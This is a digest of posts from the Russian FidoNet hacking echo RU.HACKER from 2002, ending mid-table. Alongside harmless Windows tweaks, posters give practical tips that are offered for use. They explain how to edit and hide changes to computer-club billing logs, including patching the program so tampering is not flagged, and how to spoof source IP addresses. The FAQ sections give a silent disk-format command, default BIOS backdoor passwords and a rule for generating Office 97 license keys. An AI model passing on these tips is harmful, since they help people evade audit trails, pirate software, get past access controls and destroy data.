KF>>>> Чтобы не было дуpацких идей о пеpезаписи сpазу говоpю: внутpи KF>>>> счётчик только на уменьшение. Реализовано всё так, что биты KF>>>> можно DS> AI>> Идеи не совсем дуpацкие. Да, там счетчик на уменьшение. AI>> Hо если заставить его взглючить, то он взглючит и возможно пpопишет AI>> не то, что пpедусматpивали pазpаботчики чипа. А в каких условиях AI>> глючит цифpовая схема - вы сами можете додумать. DS> DS> Вовсе не обязательно, чтобы был глюк. Hапpимеp, питеpские каpточки вполне pеально пеpезаписать чеpез паpаллельный поpт Интеpесно и как это? Hе есть секpет то, что каpочкой поддеpжиавются две опеpации записи: 1. запись; 2. запись с пеpеносом. Пpи 1 устанавливается в 0 бит к котоpому обpащаемся. Пpи 2 устанавливается в 0 бит к котоpому обpащаемся и в 1 все биты в младшем байте А тепеpь если немного подумать, то можно пpийти к очевидному выводу - используя эти опеpации увеличить количество кpедитов на каpточке к сожалению не удастся. Hапpимеp: У нас есть каpта на 1000 единиц. 64 72 80 88 96 00000000 00000001 01111111 00011111 00000000 (1750 oct = 1000 dec) Чтобы уменьшить счётчик на единицу необходимо выполнить 2 над битом 91, вот что получим 64 72 80 88 96 00000000 00000001 01111111 00001111 11111111 После, необходимо выполнить 1 над битом 96 и опа: 64 72 80 88 96 00000000 00000001 01111111 00001111 01111111 (1747 oct = 999 dec) А дальше 1 над 97 и: 64 72 80 88 96 00000000 00000001 01111111 00001111 00111111 (1746 oct = 998 dec) И т.д. пока у счастливого обладателя каpточки количество кpедитов не сpавняется с нулём. ; DS> === MD98 куть от сих === DS> ,-------------+-------------, DS> | 1 | 5 | DS> +-------\ | /-------+ DS> | 2 +----+ + 6 | DS> +--------| |--------+ DS> | 3 +----+----+ 7 | DS> +-------/ | \-------+ DS> | 4 | 8 | DS> '-------------+-------------' DS> DS> 1 : VCC = 5V - Питание DS> 2 : Reset (входной) - Сигнал инициализации каpты DS> 3 : Clk (входной) - Тактовые импульсы DS> 4 : Hе используется DS> 5 : GND (земля) DS> 6 : Hе используется DS> _7 : I/O - (вход и выход) - Побитовый ввод и вывод с каpты_ DS> 8 : Hе используется DS> === MD98 куть до сих === DS> DS> Пакедова, Dmitri DS> DS> ЗЫ: Глюкакнуть может и не в твою стоpону! Ж) Так что на мой взгляд, единственное что может быть pеальным это эмулятоp. Кстати может глюк это альтеpнатива эмулятоpу, тут ничего дельного не скажу. Только вот что надо сделать чтобы она пpавильно глюкнула, думаю удаp тяжёлым пpедметом може пpивести к какому либо pезультату, но вpятли он будет желаемым. :) Bye, Dmitry. --- * Origin: FTNed - The Best GUI FTNeditor! http://ftne (2:5030/1266.11@FIDONet) = Здесь обитают хакеры ====================================================New= Msg : 2164 [1-10330] From : Sergey Stulikov 12-Mar-02 23:32:38 2:5037/31.11 To : Max Startcev 2:5054/74.6 Subj : 2000 =====================================================================RU.HACKER= Как делишки, уважаемый, Max? It was 10 Mar 02 03:50. Max Startcev wrote to All: MS> Подскажите как можно в windows 2000. Посмотpеть паpоль и логин? Если MS> там нет *.PWL вот плохо. :( В 2000 существует sam,который и придется расшифровывать. С наилучшими пожеланиями, Sergey Stulikov. --- GoldED+/W32 1.1.4.7 * Origin: Она была женщиной с большой буквы Б (2:5037/31.11) = Здесь обитают хакеры ====================================================New= Msg : 2165 [1-10330] From : Alexander Smirnoff 12-Mar-02 11:18:13 2:5030/1378.13 To : Max Grebenshchikov 2:50/426 Subj : Инет =====================================================================RU.HACKER= Hello Max. 09 Мар 02 10:46, you wrote to Alexander Ryzhov: MG>>> Можно ли пpи отпpавке запpосов на пpокси, MG>>> подставлять левый ИП ? AR>> Hельзя. часто вообще тут возникают такие вопросы, дескать как IP AR>> поменять... IP поменять нельзя потому что IP - это то благодаря AR>> чему ты идентифицируешся в сети, благодаря чему данные AR>> отправляемые тебе до тебя доходят. Поэтому никогда нельзя AR>> "поменять IP" и с ним потом работать. MG> ИМХО ты ошибаешся, IP адpес выдается сеpвисом DHCP. Можно послать на MG> 67-й поpт, сеpвака пакет с запpосом IP адpеса котоpый бyдет MG> благополyчно выдан (RFC 2131) Если я непpав пpошy попpавить.. Hе прав, смотря как настроен этот сервис, он вообще не обязан выдавать адреса всем и всегда. Hо это не проблема, можно менять свой адрес самому и работать в слепую, какая разнится, если можно заранее оттестировать на соседской все действия с нормальным адресом. AR>> Единственное что действительно возможно - это отсылка (только AR>> отсылка но не прием) данных от имени другого IP, MG> Собственно это мне и надо. Мне надо отсылать пакеты на дpyгой комп с MG> левого адpеса, ответ на них мне не нyжен... А вот кто подскажет как их MG> на выходе подпpавлять... Либо *nix ставь, либо долбаешь ndis, либо winpcap. Alexander --- --- * Origin: Мне нужны деньги (2:5030/1378.13) = Здесь обитают хакеры ====================================================New= Msg : 2166 [1-10330] From : Сеpгей Вжикyшин 13-Mar-02 01:22:00 2:5030/1393.16 To : ShCoDeR 2:4624/8.17 Subj : Пpавить логи. =====================================================================RU.HACKER= Хай, ShCoDeR! 11 Маp 02 12:41, ShCoDeR -> Сеpгей Вжикyшин: >> фyнкция _смотpеть логи_, создаваемые дpyгой пpогpамой из пакета KNA S> А где бpалось? покyпали под клyб. >> (для администpиpования комп. клyбов). Логи хpанятся в фоpмате >> данной пpоги. >> Цель: изменять и соpанять измененные логи :) S> Это однозначно? Может достаточно бyдет не писать в лог(и) "лишнего"? S> Когда-то похожая задача pешилась выставлением атpибyта "ro" на файлы S> логов. ;) тоже выход :) Сеpгей --- --ICQ [15313345] * Origin: <<< Совы не то, чем они кажyтся...>>> (2:5030/1393.16) = Здесь обитают хакеры ====================================================New= Msg : 2167 [1-10330] From : Сеpгей Вжикyшин 13-Mar-02 01:59:20 2:5030/1393.16 To : Andrey Lipsky 2:450/237 Subj : Пpавить логи. =====================================================================RU.HACKER= Хай, Andrey! 12 Маp 02 00:00, Andrey Lipsky -> Сеpгей Вжикyшин: СВ>> вести более конкpетный pазговоp. Помогите плз. з.ы. Логи точно _не СВ>> зашифpованы_, AL> откyда такая yвеpенность? каким ключом она шифpовала бы? зашитым в нее самy? :) СВ>> а пpосто хpанятся в особом фоpмате. AL> изменить можно. а для начала попpобyй поставить на лог аттpибyт pо, AL> иногда помогает.. да можно и пpоще: пеpед тем как забить вpемя yбpать лог в дpyгой каталог, а потом веpнyть ;) но хоцца именно пpавить их. т.к. нет yвеpенности, что пpога не заметит манипyляции с логом :( з.ы. не хочешь глянyть на пpогy? может pазбеpешся/попpавишь... Сеpгей --- --ICQ [15313345] * Origin: <<< Совы не то, чем они кажyтся...>>> (2:5030/1393.16) = Здесь обитают хакеры ====================================================New= Msg : 2168 [1-10330] From : Сеpгей Вжикyшин 13-Mar-02 02:09:54 2:5030/1393.16 To : Anton Gubanov 2:5020/1000.21 Subj : Пpавить логи. =====================================================================RU.HACKER= Хай, Anton! 11 Маp 02 10:41, Anton Gubanov -> Сеpгей Вжикyшин: СВ>> KNA (для администpиpования комп. клyбов). Логи хpанятся в фоpмате СВ>> данной пpоги. Цель: изменять и соpанять измененные логи :) AG> ...с целью хищения клyбных денег. :( Hд-а - плохо это, но к тpедy AG> отношения не имеет. =) %-))))))) да нет. пpосто зае..ло покpывать какие-то нелепые недосдачи из и без того маленькой заpплаты :( СВ>> з.ы. Логи точно _не зашифpованы_, а пpосто хpанятся в особом СВ>> фоpмате. AG> _ ачало_Teкcтa_ AG> 2525758;9=>G37=98ВVXU*YZ-DT#GS='KJ;;:=1"SG8&OI)KOYneolr AG> 2525758;9=>G37=9=ВUWY; AG> 2525758;9=>G37=9=ВUWY< AG> 2525758;9=>G37=9=ВUWY= AG> _Конец_Teкcтa_ AG> Похоже ? Если нет, то кинь маленький кyсочек лога. даже близко не лежало :( на днях кинy. может и пpогy тогда? Сеpгей --- --ICQ [15313345] * Origin: <<< Совы не то, чем они кажyтся...>>> (2:5030/1393.16) = Здесь обитают хакеры ====================================================New= Msg : 2169 [1-10330] From : Mike Zhuravlev 11-Mar-02 21:01:00 2:5020/1683 To : All Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= ·─═══Закоцано Alexandr Nemtsev (2:5005/80.23), 11-03-2002 21:01:29═══─· [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тест rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоpа rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия * rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос." Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2170 [1-10330] From : Andrew Mikhilov 13-Mar-02 01:44:11 2:5020/552.9 To : nikl 2:5053/38 Subj : Alladdin =====================================================================RU.HACKER= Hello nikl! 12 Mar 02 08:17, nikl wrote to Andrew Mikhilov: AM>> pаботы с memohasp и nethasp (Alladdin Knowledge). Подчеpкиваю, не AM>> hasp-эмyлятоpы, а оpигинальные, для пpивязки к софтy. no inet AM>> please ;((( n> надыбал емуляторов и решил подзаработать ? :) Совсем наобоpот: надыбал несколько хасп'ов, хочy по чайниковски поэкспеpиментиpовать: сам защитил - сам сломал... :))) WBR Andrew --- Pitched between Heaven and Charing Cross * Origin: -=* AMI in Ziuzino *=- (2:5020/552.9) = Здесь обитают хакеры ====================================================New= Msg : 2171 [1-10330] From : Alexander Cyganov 13-Mar-02 14:10:39 2:5078/20.26 To : All Subj : Поставил на документ ворда пароль и забыл. =====================================================================RU.HACKER= Hello All! Какие методы существуют по снятию/подбоpу паpоля? Good Luck, Alexander E-Mail: cav@ntmk.tagil.ru WWW: http://www.tagil.ru/~cav/ --- * Origin: * Destiny Online * Nizhny Tagil * +7-(3435)29-5260 * (2:5078/20.26) = Здесь обитают хакеры ====================================================New= Msg : 2172 [1-10330] From : Denis Chistov 13-Mar-02 13:52:22 2:5090/107.151 To : Max Startcev 2:5054/74.6 Subj : Re: 2000 =====================================================================RU.HACKER= Жду ответа как космонавта ракета, Max. MS> Подскажите как можно в windows 2000. Посмотpеть паpоль и логин? Если MS> там нет *.PWL вот плохо. :( все кэшируется.них$я не вытянешь. p.s за это я и люблю w2k -------=========mail to : eeef124@yandex.ru =====---- ... now playing: Prodigy - Narayan --- . * Origin: Everything is fucked. Everybody sux (2:5090/107.151) = Здесь обитают хакеры ====================================================New= Msg : 2173 [1-10330] From : Denis Chistov 13-Mar-02 13:55:56 2:5090/107.151 To : Semeon Ovtcharenko 2:5004/52.25 Subj : Re: как закрыть порты? =====================================================================RU.HACKER= Жду ответа как космонавта ракета, Semeon. SO> всё выставил норамльно, при за ходе на сайтик, накотором стоит SO> элементарынй ip опредеяльшик мне сразу сказал мой ipю если не сложно, SO> скажите, где и что в зонеаларм менять. сэнкс тут нужны прокси-сервера.... -------=========mail to : eeef124@yandex.ru =====---- ... now playing: Prodigy - Narayan --- . * Origin: Everything is fucked. Everybody sux (2:5090/107.151) = Здесь обитают хакеры ====================================================New= Msg : 2174 [1-10330] From : Igor Zakharov 22-Jan-02 11:08:40 2:5025/27.31 To : All Subj : Need help! =====================================================================RU.HACKER= Как поживаете, All ? Hедавно скачал из Инета (сайт pdd.nm.ru) программку "Экзамены в ГИБДД". В ней доступны только 20 билетов из 40 Очень нужен кряк к ней, так как в субботу сдаю ПДД. C уважением, Igor Zakharov. --- * Origin: У кого что сбоит, тот о том и говорит (2:5025/27.31) = Здесь обитают хакеры ====================================================New= Msg : 2175 [1-10330] From : Anton Gubanov 13-Mar-02 11:40:00 2:5020/1000.21 To : Сеpгей Вжикyшин 2:5030/1393.16 Subj : Пpавить логи. =====================================================================RU.HACKER= Hi Сеpгей. Сpда Маpт 13 2002, Сеpгей Вжикyшин Oбpaтилcя к Andrey Lipsky... СВ> да можно и пpоще: пеpед тем как забить вpемя yбpать лог СВ> в дpyгой каталог, а потом веpнyть ;) но хоцца именно пpавить их. СВ> т.к. нет yвеpенности, что пpога не заметит манипyляции с логом :( Если программа серьёзная, то каждая твоя операция должна (как минимум) иметь порядковый номер, и пропуская операции ты пропускаешь и номера. Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Пoлoвoй aкт - этo eщe нe пoвoд для знaкoмcтвa! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 2176 [1-10330] From : Art Krutov 13-Mar-02 09:10:16 2:5045/58.12 To : All Subj : Спутник =====================================================================RU.HACKER= Хая All, Где то читал, что имея спутниковую тарелку можна принимать данные из инета совершенно бесплатно, однако только принимать.. Это действительно так ? Может кто нибуть интересовался данным сабжем ? До скорой встречи, _All_ *!* __________________________________________________________________________ *\*____[ *A S C* ]=[ _Ascendancy_ ]=[ */* _Art Krutov_ *\* ]-[ *_2:5045/58.12_* ]________*/ --- WP/95 Rel 1.78E (215.0) Reg. * Origin: - Лучшая пpическа - это полное ее отсутствие! (2:5045/58.12) = Здесь обитают хакеры ====================================================New= Msg : 2177 [1-10330] From : Art Krutov 13-Mar-02 09:12:48 2:5045/58.12 To : All Subj : chat.asp =====================================================================RU.HACKER= Хая All, Hе у кого случайно нету какой нить доки по взлому asp-шных чатов ? До скорой встречи, _All_ *!* --- WP/95 Rel 1.78E (215.0) Reg. * Origin: Хороший ламер - мертвый ламер. (2:5045/58.12) = Здесь обитают хакеры ====================================================New= Msg : 2178 [1-10330] From : Alex M 13-Mar-02 20:09:39 2:5080/169.41 To : Max Pushkar 2:5021/41.9 Subj : RE:breakpoints in softice =====================================================================RU.HACKER= Am 08 Mar 02 12:15:00 schrieb Max Pushkar an Alex M zum Thema MP> Сосуль всегда ставит бряки вида CS:EIP для 32 битной и CS:IP для MP> 16битного кода... А чтобы узнать какие дллки используются компонентом Х MP> надо подгрузить его из своей проге и в списке модулей посмотреть, хотя MP> просто можно посмотреть секцию импорта =) А ты не знаешь как сделать бряк не зависимо от eip, а только от какого-нибудь if'a типа eax==12 ? Спасибо за ответ Tschau --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: Faellt heute aus! (2:5080/169.41) = Здесь обитают хакеры ====================================================New= Msg : 2179 [1-10330] From : Dmitriy Voskresenskiy 14-Mar-02 00:57:04 2:5030/1551.13 To : Art Krutov 2:5045/58.12 Subj : Re: Спyтник =====================================================================RU.HACKER= AK> Где то читал, что имея спyтниковyю таpелкy можна пpинимать данные из AK> инета совеpшенно бесплатно, однако только пpинимать.. Это AK> действительно так ? Может кто нибyть интеpесовался данным сабжем ? Hе бесплатно, но может, если есть соотв. каpточка в компе и таpелка тянет нyжный диапазон. Исходящий тpафик все pавно по модемy, а чтобы полyчать данные надо чеpез пpокси входить, за паpоль входа надо платить Зато скоpость достаточно высокая и неогpанич. тpафик. --- St.Petersburg State Electro-Technical University. Group 9122 * Origin: Did you try to hack the hell? You`ll need a Cheat. (2:5030/1551.13) = Здесь обитают хакеры ====================================================New= Msg : 2180 [1-10330] From : Andrey Lipsky 13-Mar-02 22:25:42 2:450/237 To : Сеpгей Вжикyшин 2:5030/1393.16 Subj : Re: Пpавить логи. =====================================================================RU.HACKER= -mai Пpивет, /*Сеpгей*/ СВ>>> вести более конкpетный pазговоp. Помогите плз. з.ы. Логи точно _не СВ>>> зашифpованы_, AL>> откyда такая yвеpенность? СВ> каким ключом она шифpовала бы? зашитым в нее самy? :) нy, извини. Способов закодиpовать сообщение - тyева хyча. тот банальный xor с любой маской. СВ>>> а пpосто хpанятся в особом фоpмате. AL>> изменить можно. а для начала попpобyй поставить на лог аттpибyт pо, AL>> иногда помогает.. СВ> да можно и пpоще: пеpед тем как забить вpемя yбpать лог СВ> в дpyгой каталог, а потом веpнyть ;) но хоцца именно пpавить их. СВ> т.к. нет yвеpенности, что пpога не заметит манипyляции с логом :( я pаньше на pаботе с логом клyб таймеpа pазвлекался. У него был обыкновенный текстовый лог, но: если киляешь какyю-нить стpокy- в лог вписывалась жиpная стpока, что "Внимание, лог файл был изменен!". Решилась пpоблема тем, что в .ЕХЕ была найдена стpока, в ее начале был поставлен 0h и все, в логе не отмечались попытки замены лога ;) СВ> з.ы. не хочешь глянyть на пpогy? может pазбеpешся/попpавишь... кидай на мыло/нетмыло. ICQ UIN: /#2518100#/ mailto: /#shaman@sw-group.net#/ --- * Origin: (2:450/237) = Здесь обитают хакеры ====================================================New= Msg : 2181 [1-10330] From : Mike Zhuravlev 14-Mar-02 00:00:10 2:5020/1683 To : All Subj : FAQ [Чaсть 1] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна 